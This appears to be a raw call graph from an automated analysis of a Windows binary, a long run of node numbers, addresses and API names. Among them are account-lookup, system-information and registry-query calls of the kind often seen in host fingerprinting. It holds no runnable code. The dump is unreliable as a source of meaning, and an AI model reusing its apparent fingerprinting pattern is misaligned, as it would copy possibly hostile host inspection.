33639->33640 33641 87597f 33640->33641 33642 8799b0 2 API calls 33641->33642 33647 875993 ListArray 33642->33647 33643 876627 33645 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33643->33645 33644 87677b 33646 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33644->33646 33648 87663d 33645->33648 33649 876790 33646->33649 33647->33643 33647->33644 33651 865d40 2 API calls 33648->33651 33650 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33649->33650 33652 8767a5 33650->33652 33653 876648 33651->33653 34177 864940 RtlAllocateHeap RtlAllocateHeap ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 33652->34177 33655 8799b0 2 API calls 33653->33655 33666 87665c __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33655->33666 33656 8767b4 33657 878df0 2 API calls 33656->33657 33664 8767fb 33657->33664 33658 8768f6 33659 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33658->33659 33660 87690c 33659->33660 33661 865d40 2 API calls 33660->33661 33663 876917 33661->33663 33662 87a330 RtlAllocateHeap RtlAllocateHeap 33662->33664 33665 8798b0 2 API calls 33663->33665 33664->33658 33664->33662 33665->33666 33666->33374 33671 868170 ListArray 33667->33671 33675 8680a5 ListArray 33667->33675 33668 868237 34178 879890 RtlAllocateHeap RtlAllocateHeap 33668->34178 33669 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33669->33675 33672 868210 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33671->33672 33673 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33671->33673 33672->33422 33674 868241 33673->33674 33675->33668 33675->33669 33675->33671 33706 49f0cae 33676->33706 33677 8661bf LookupAccountNameA 33678 866212 33677->33678 33679 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33678->33679 33680 866226 33679->33680 33681 865d40 2 API calls 33680->33681 33682 866231 33681->33682 34179 8621c0 33682->34179 33684 866249 ListArray 33685 8664b7 33684->33685 33686 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33684->33686 33687 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33685->33687 33688 8662b2 33686->33688 33689 8664bc 33687->33689 33690 865d40 2 API calls 33688->33690 33691 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33689->33691 33692 8662bd 33690->33692 33702 866463 33691->33702 33694 8621c0 4 API calls 33692->33694 33693 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33695 8664c6 33693->33695 33705 8662d7 ListArray 33694->33705 33696 8663d2 33697 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33696->33697 33699 86641c 33697->33699 33698 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33698->33705 33700 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33699->33700 33700->33702 33701 865d40 2 API calls 33701->33705 33702->33693 33703 86648f __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33702->33703 33703->33400 33704 8621c0 4 API calls 33704->33705 33705->33685 33705->33689 33705->33696 33705->33698 33705->33701 33705->33704 33706->33677 33708 866821 33707->33708 33719 866548 ListArray 33707->33719 33709 866844 33708->33709 33710 8668e3 33708->33710 33711 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33709->33711 34218 879890 RtlAllocateHeap RtlAllocateHeap 33710->34218 33713 866863 ListArray 33711->33713 33714 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33713->33714 33716 8668b9 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33713->33716 33715 8668ed 33714->33715 33716->33410 33717 879750 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 33717->33719 33719->33708 33719->33710 33719->33713 33719->33717 34217 87a910 RtlAllocateHeap RtlAllocateHeap __InternalCxxFrameHandler std::_Rethrow_future_exception 33719->34217 33721 867916 Concurrency::details::QuickBitSet::Grow 33720->33721 33722 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33721->33722 33765 867a68 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33721->33765 33723 867947 33722->33723 33724 865d40 2 API calls 33723->33724 33725 867952 33724->33725 33726 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33725->33726 33727 867974 33726->33727 33728 865d40 2 API calls 33727->33728 33730 86797f ListArray 33728->33730 33729 867a26 ListArray 33731 867a53 GetNativeSystemInfo 33729->33731 33736 867a57 33729->33736 33730->33729 33732 867e38 33730->33732 33731->33736 33733 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33732->33733 33762 867b2c 33733->33762 33734 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33735 867e42 33734->33735 33737 867b94 33736->33737 33738 867abf 33736->33738 33736->33765 33740 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33737->33740 33739 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33738->33739 33741 867ae0 33739->33741 33742 867bc0 33740->33742 33743 865d40 2 API calls 33741->33743 33744 865d40 2 API calls 33742->33744 33745 867ae7 33743->33745 33746 867bc7 33744->33746 33748 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33745->33748 33747 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33746->33747 33749 867bdf 33747->33749 33750 867aff 33748->33750 33751 865d40 2 API calls 33749->33751 33752 865d40 2 API calls 33750->33752 33753 867be6 33751->33753 33754 867b06 33752->33754 33755 865e90 5 API calls 33753->33755 33756 865e90 5 API calls 33754->33756 33757 867bf7 33755->33757 33758 867b1b 33756->33758 33759 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33757->33759 34219 89a1e1 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 33758->34219 33761 867c12 33759->33761 33763 865d40 2 API calls 33761->33763 33762->33734 33762->33765 33764 867c19 33763->33764 34220 865860 RtlAllocateHeap RtlAllocateHeap __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 33764->34220 33765->33408 33767 867c28 33768 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33767->33768 33769 867c63 33768->33769 33770 865d40 2 API calls 33769->33770 33771 867c6a 33770->33771 33772 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33771->33772 33773 867c82 33772->33773 33774 865d40 2 API calls 33773->33774 33775 867c89 33774->33775 33776 865e90 5 API calls 33775->33776 33777 867c9a 33776->33777 33778 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33777->33778 33779 867cb5 33778->33779 33780 865d40 2 API calls 33779->33780 33781 867cbc 33780->33781 34221 865860 RtlAllocateHeap RtlAllocateHeap __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 33781->34221 33783 867ccb 33784 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33783->33784 33785 867d06 33784->33785 33786 865d40 2 API calls 33785->33786 33787 867d0d 33786->33787 33788 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33787->33788 33789 867d25 33788->33789 33790 865d40 2 API calls 33789->33790 33791 867d2c 33790->33791 33792 865e90 5 API calls 33791->33792 33793 867d3d 33792->33793 33794 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33793->33794 33795 867d58 33794->33795 33796 865d40 2 API calls 33795->33796 33797 867d5f 33796->33797 34222 865860 RtlAllocateHeap RtlAllocateHeap __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 33797->34222 33800 8644d4 33799->33800 33801 864547 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 33800->33801 33802 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33800->33802 33801->33415 33802->33801 33804 867eb5 Concurrency::details::QuickBitSet::Grow 33803->33804 33805 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33804->33805 33808 867ed3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 33804->33808 33806 867eec 33805->33806 33807 865d40 2 API calls 33806->33807 33809 867ef7 33807->33809 33808->33419 33810 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33809->33810 33811 867f19 33810->33811 33812 865d40 2 API calls 33811->33812 33815 867f24 ListArray 33812->33815 33813 867fc7 ListArray 33813->33808 33816 867ff4 GetNativeSystemInfo 33813->33816 33814 86803c 33817 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33814->33817 33815->33813 33815->33814 33816->33808 33818 868041 33817->33818 34223 895780 33819->34223 33821 865ee4 RegOpenKeyExA 33822 865f17 RegQueryValueExA 33821->33822 33823 865f41 RegCloseKey 33821->33823 33822->33823 33824 865f67 33823->33824 33824->33824 33825 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33824->33825 33827 865f7f ListArray 33825->33827 33826 865fe7 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33826->33466 33827->33826 33828 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33827->33828 33829 866012 33828->33829 33833 879491 __InternalCxxFrameHandler 33830->33833 33834 8794bc 33830->33834 33831 8795b0 34226 87a900 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 33831->34226 33833->33491 33834->33831 33835 8795ab 33834->33835 33837 879537 33834->33837 33838 879510 33834->33838 34225 862380 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::SchedulerBase::Initialize 33835->34225 33836 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33844 8795ba std::_Rethrow_future_exception 33836->33844 33842 87ea77 Hash 2 API calls 33837->33842 33845 879521 std::_Rethrow_future_exception 33837->33845 33838->33835 33840 87951b 33838->33840 33841 87ea77 Hash 2 API calls 33840->33841 33841->33845 33842->33845 33843 8795f1 ListArray 33843->33491 33844->33843 33846 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33844->33846 33845->33836 33848 879592 ListArray 33845->33848 33847 87960c 33846->33847 33848->33491 33850 878e0b 33849->33850 33862 878ef4 ListArray std::_Rethrow_future_exception 33849->33862 33851 878f81 33850->33851 33854 878ea1 33850->33854 33855 878e7a 33850->33855 33861 878e8b std::_Rethrow_future_exception 33850->33861 33850->33862 34227 87a900 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 33851->34227 33853 878f86 34228 862380 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::SchedulerBase::Initialize 33853->34228 33859 87ea77 Hash 2 API calls 33854->33859 33854->33861 33855->33853 33858 87ea77 Hash 2 API calls 33855->33858 33857 878f8b 33858->33861 33859->33861 33860 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33860->33851 33861->33860 33861->33862 33862->33503 33863->33514 33864->33517 33865->33523 33867 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33866->33867 33868 8744f2 33867->33868 33869 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33868->33869 33870 874504 33869->33870 33871 868050 2 API calls 33870->33871 33872 87450d 33871->33872 33873 874766 33872->33873 33888 874518 ListArray 33872->33888 33874 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33873->33874 33875 874777 33874->33875 33876 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33875->33876 33878 87478c 33876->33878 33877 8748c3 34230 879890 RtlAllocateHeap RtlAllocateHeap 33877->34230 33880 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33878->33880 33881 874730 ListArray 33880->33881 33882 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33881->33882 33883 87489e __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33881->33883 33885 8748cd 33882->33885 33883->33472 33886 875003 ListArray 33885->33886 33887 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33885->33887 33889 875079 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33886->33889 33891 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33886->33891 33890 87492c 33887->33890 33888->33877 33888->33881 33900 879090 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 33888->33900 33917 879750 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 33888->33917 34229 87a910 RtlAllocateHeap RtlAllocateHeap __InternalCxxFrameHandler std::_Rethrow_future_exception 33888->34229 33889->33472 33892 865d40 2 API calls 33890->33892 33893 8750da 33891->33893 33894 874933 33892->33894 33897 866160 6 API calls 33893->33897 33895 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33894->33895 33896 874945 33895->33896 33898 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33896->33898 33899 875135 33897->33899 33901 874957 33898->33901 33902 8664d0 2 API calls 33899->33902 33900->33888 33903 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33901->33903 33910 875145 ListArray 33902->33910 33906 874978 33903->33906 33904 8751fe ListArray 33905 8678b0 9 API calls 33904->33905 33908 87520d 33905->33908 33909 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33906->33909 33907 876d66 33911 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33907->33911 33912 8644b0 2 API calls 33908->33912 33913 874990 33909->33913 33910->33904 33910->33907 33914 876d89 33911->33914 33915 87521a 33912->33915 33916 865d40 2 API calls 33913->33916 33918 867e50 3 API calls 33915->33918 33919 874997 33916->33919 33917->33888 33920 875226 33918->33920 33921 868050 2 API calls 33919->33921 33922 8644b0 2 API calls 33920->33922 33923 8749a3 33921->33923 33924 875233 33922->33924 33925 874c29 33923->33925 33927 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33923->33927 33932 8644b0 2 API calls 33924->33932 33926 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33925->33926 33996 8750bc 33925->33996 33929 874c4f 33926->33929 33928 8749bf 33927->33928 33930 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33928->33930 33931 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33929->33931 33934 8749d7 33930->33934 33935 874c64 33931->33935 33933 875250 33932->33933 33936 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33933->33936 33937 865d40 2 API calls 33934->33937 33938 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33935->33938 33939 87526e 33936->33939 33940 8749de 33937->33940 33941 874c76 33938->33941 33942 865d40 2 API calls 33939->33942 33943 868050 2 API calls 33940->33943 33947 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33941->33947 33944 875275 33942->33944 33945 8749ea 33943->33945 33946 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33944->33946 33945->33925 33949 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33945->33949 33948 87528a 33946->33948 33950 874c97 33947->33950 33951 865d40 2 API calls 33948->33951 33952 874a07 33949->33952 33953 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33950->33953 33954 875291 33951->33954 33955 865d40 2 API calls 33952->33955 33956 874caf 33953->33956 33957 865e90 5 API calls 33954->33957 33961 874a0f 33955->33961 33958 865d40 2 API calls 33956->33958 33968 8752a3 33957->33968 33959 874cb6 33958->33959 33960 868050 2 API calls 33959->33960 33962 874cc2 33960->33962 33963 87509e 33961->33963 33964 874a5b 33961->33964 33967 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33962->33967 33974 874f90 ListArray 33962->33974 34234 879890 RtlAllocateHeap RtlAllocateHeap 33963->34234 33966 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33964->33966 33981 874a79 ListArray 33966->33981 33970 874cde 33967->33970 33971 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33968->33971 33969 8750a3 33972 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33969->33972 33973 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33970->33973 33987 87530c 33971->33987 33976 8750a8 33972->33976 33977 874cf6 33973->33977 33974->33886 33975 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33974->33975 33975->33886 33979 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33976->33979 33980 865d40 2 API calls 33977->33980 33978 874aed ListArray 33982 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33978->33982 33984 8750ad 33979->33984 33985 874cfd 33980->33985 33981->33969 33981->33978 33983 874b06 33982->33983 33986 865d40 2 API calls 33983->33986 34235 87d829 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::SchedulerBase::Initialize 33984->34235 33989 868050 2 API calls 33985->33989 33998 874b0e 33986->33998 33990 879470 2 API calls 33987->33990 33992 874d09 33989->33992 33993 875378 33990->33993 33991 8750b7 34236 879890 RtlAllocateHeap RtlAllocateHeap 33991->34236 33992->33974 33997 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33992->33997 33995 878df0 2 API calls 33993->33995 34005 8753d7 33995->34005 34237 87d869 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::SchedulerBase::Initialize 33996->34237 34000 874d26 33997->34000 34001 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33998->34001 34003 865d40 2 API calls 34000->34003 34010 874b69 ListArray 34001->34010 34002 8750c6 34004 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34002->34004 34011 874d2e 34003->34011 34006 8750cb 34004->34006 34014 875455 ListArray 34005->34014 34238 87a330 2 API calls 5 library calls 34005->34238 34009 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34006->34009 34008 874bdd ListArray 34008->33925 34231 8693c0 2 API calls 4 library calls 34008->34231 34009->33974 34010->33976 34010->34008 34011->33991 34012 874d7a 34011->34012 34015 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34012->34015 34018 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34014->34018 34022 874d98 ListArray 34015->34022 34016 874bf5 34016->33925 34232 898ba3 RtlAllocateHeap __dosmaperr 34016->34232 34027 87551d ListArray 34018->34027 34019 874bfe 34233 89a0d9 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 34019->34233 34020 874e0c ListArray 34021 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34020->34021 34024 874e25 34021->34024 34022->34002 34022->34020 34026 865d40 2 API calls 34024->34026 34025 874c1d 34025->33925 34025->33984 34031 874e2d 34026->34031 34028 8644b0 2 API calls 34027->34028 34029 8755bd 34028->34029 34030 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34029->34030 34032 8755d7 34030->34032 34033 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34031->34033 34034 865d40 2 API calls 34032->34034 34039 874e88 ListArray 34033->34039 34035 8755e2 34034->34035 34036 8644b0 2 API calls 34035->34036 34038 8755f7 34036->34038 34037 874efc ListArray 34040 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34037->34040 34041 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34038->34041 34039->34006 34039->34037 34042 874f17 34040->34042 34043 87560b 34041->34043 34045 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34042->34045 34044 865d40 2 API calls 34043->34044 34046 875616 34044->34046 34047 874f2c 34045->34047 34048 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34046->34048 34049 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34047->34049 34050 875634 34048->34050 34051 874f47 34049->34051 34052 865d40 2 API calls 34050->34052 34053 865d40 2 API calls 34051->34053 34054 87563f 34052->34054 34055 874f4e 34053->34055 34056 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34054->34056 34058 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34055->34058 34057 87565d 34056->34057 34059 865d40 2 API calls 34057->34059 34060 874f87 34058->34060 34061 875668 34059->34061 34062 8744b0 11 API calls 34060->34062 34063 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34061->34063 34062->33974 34064 875686 34063->34064 34065 865d40 2 API calls 34064->34065 34066 875691 34065->34066 34067 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34066->34067 34068 8756af 34067->34068 34069 865d40 2 API calls 34068->34069 34070 8756ba 34069->34070 34071 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34070->34071 34072 8756d8 34071->34072 34073 865d40 2 API calls 34072->34073 34074 8756e3 34073->34074 34075 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34074->34075 34076 875701 34075->34076 34077 865d40 2 API calls 34076->34077 34078 87570c 34077->34078 34079 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34078->34079 34080 87572a 34079->34080 34081 865d40 2 API calls 34080->34081 34082 875735 34081->34082 34083 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34082->34083 34084 875751 34083->34084 34085 865d40 2 API calls 34084->34085 34086 87575c 34085->34086 34087 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34086->34087 34088 875773 34087->34088 34089 865d40 2 API calls 34088->34089 34090 87577e 34089->34090 34091 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34090->34091 34092 875795 34091->34092 34093 865d40 2 API calls 34092->34093 34094 8757a0 34093->34094 34095 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34094->34095 34096 8757bc 34095->34096 34097 865d40 2 API calls 34096->34097 34098 8757c7 34097->34098 34099 8799b0 2 API calls 34098->34099 34100 8757db 34099->34100 34101 8798b0 2 API calls 34100->34101 34102 8757ef 34101->34102 34103 8798b0 2 API calls 34102->34103 34104 875803 34103->34104 34105 8798b0 2 API calls 34104->34105 34106 875817 34105->34106 34107 8799b0 2 API calls 34106->34107 34108 87582b 34107->34108 34109 8798b0 2 API calls 34108->34109 34110 87583f 34109->34110 34111 8799b0 2 API calls 34110->34111 34112 875853 34111->34112 34113 8798b0 2 API calls 34112->34113 34114 875867 34113->34114 34115 8799b0 2 API calls 34114->34115 34116 87587b 34115->34116 34117 8798b0 2 API calls 34116->34117 34118 87588f 34117->34118 34119 8799b0 2 API calls 34118->34119 34120 8758a3 34119->34120 34121 8798b0 2 API calls 34120->34121 34122 8758b7 34121->34122 34123 8799b0 2 API calls 34122->34123 34124 8758cb 34123->34124 34125 8798b0 2 API calls 34124->34125 34126 8758df 34125->34126 34127 8799b0 2 API calls 34126->34127 34128 8758f3 34127->34128 34129 8798b0 2 API calls 34128->34129 34130 875907 34129->34130 34131 8799b0 2 API calls 34130->34131 34132 87591b 34131->34132 34133 8798b0 2 API calls 34132->34133 34134 87592f 34133->34134 34135 8799b0 2 API calls 34134->34135 34136 875943 34135->34136 34137 8798b0 2 API calls 34136->34137 34138 875957 34137->34138 34139 8798b0 2 API calls 34138->34139 34140 87596b 34139->34140 34141 8798b0 2 API calls 34140->34141 34142 87597f 34141->34142 34143 8799b0 2 API calls 34142->34143 34148 875993 ListArray 34143->34148 34144 876627 34146 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34144->34146 34145 87677b 34147 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34145->34147 34149 87663d 34146->34149 34150 876790 34147->34150 34148->34144 34148->34145 34152 865d40 2 API calls 34149->34152 34151 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34150->34151 34153 8767a5 34151->34153 34154 876648 34152->34154 34239 864940 RtlAllocateHeap RtlAllocateHeap ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 34153->34239 34156 8799b0 2 API calls 34154->34156 34167 87665c __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 34156->34167 34157 8767b4 34158 878df0 2 API calls 34157->34158 34165 8767fb 34158->34165 34159 8768f6 34160 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34159->34160 34161 87690c 34160->34161 34162 865d40 2 API calls 34161->34162 34164 876917 34162->34164 34163 87a330 RtlAllocateHeap RtlAllocateHeap 34163->34165 34166 8798b0 2 API calls 34164->34166 34165->34159 34165->34163 34166->34167 34167->33472 34171->33500 34172->33503 34174 8799c9 34173->34174 34175 8799dd __InternalCxxFrameHandler 34174->34175 34240 87a5d0 2 API calls 4 library calls 34174->34240 34175->33599 34177->33656 34182 862180 34179->34182 34183 862196 34182->34183 34186 899dc7 34183->34186 34189 898bb6 34186->34189 34188 8621a4 34188->33684 34190 898bde 34189->34190 34191 898bf6 34189->34191 34202 898ba3 RtlAllocateHeap __dosmaperr 34190->34202 34191->34190 34193 898bfe 34191->34193 34204 897f9a 34193->34204 34194 898be3 34203 8982ea RtlAllocateHeap __cftof 34194->34203 34197 898c0e 34212 899171 4 API calls 2 library calls 34197->34212 34198 898bee __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 34198->34188 34201 898c95 34213 898fc6 RtlAllocateHeap ___free_lconv_mon 34201->34213 34202->34194 34203->34198 34205 897fba 34204->34205 34206 897fb1 34204->34206 34205->34206 34214 89bc91 3 API calls 3 library calls 34205->34214 34206->34197 34208 897fda 34215 89cc1b GetPEB GetPEB RtlAllocateHeap __cftof 34208->34215 34210 897ff0 34216 89cc48 GetPEB GetPEB RtlAllocateHeap __cftof 34210->34216 34212->34201 34213->34198 34214->34208 34215->34210 34216->34206 34217->33719 34219->33762 34220->33767 34221->33783 34222->33765 34224 895797 34223->34224 34224->33821 34224->34224 34225->33831 34228->33857 34229->33888 34231->34016 34232->34019 34233->34025 34237->34002 34238->34005 34239->34157 34240->34175 34242 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34241->34242 34243 877ed2 34242->34243 34244 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34243->34244 34245 877ee4 34244->34245 34246 868050 2 API calls 34245->34246 34247 877eed 34246->34247 34248 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34247->34248 34249 878157 34248->34249 34250 86bfad 34262 897e47 34250->34262 34252 86bfb3 34271 897db9 34252->34271 34255 897e47 3 API calls 34256 86c00f 34255->34256 34258 86c04f ListArray 34256->34258 34259 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34256->34259 34257 86c0c1 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 34258->34257 34260 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34258->34260 34259->34258 34261 86c0fb 34260->34261 34263 897e53 ___scrt_is_nonwritable_in_current_image 34262->34263 34264 897e5d 34263->34264 34268 897e72 ___scrt_uninitialize_crt 34263->34268 34274 898ba3 RtlAllocateHeap __dosmaperr 34264->34274 34265 897e6d 34265->34252 34267 897e62 34275 8982ea RtlAllocateHeap __cftof 34267->34275 34268->34265 34276 897dd0 3 API calls 4 library calls 34268->34276 34277 897d02 34271->34277 34273 86c002 34273->34255 34274->34267 34275->34265 34276->34265 34279 897d0e ___scrt_is_nonwritable_in_current_image 34277->34279 34278 897d15 34295 898ba3 RtlAllocateHeap __dosmaperr 34278->34295 34279->34278 34281 897d35 34279->34281 34284 897d3a 34281->34284 34285 897d47 34281->34285 34282 897d1a 34296 8982ea RtlAllocateHeap __cftof 34282->34296 34297 898ba3 RtlAllocateHeap __dosmaperr 34284->34297 34291 89bee3 34285->34291 34288 897d50 34290 897d25 34288->34290 34298 898ba3 RtlAllocateHeap __dosmaperr 34288->34298 34290->34273 34292 89beef 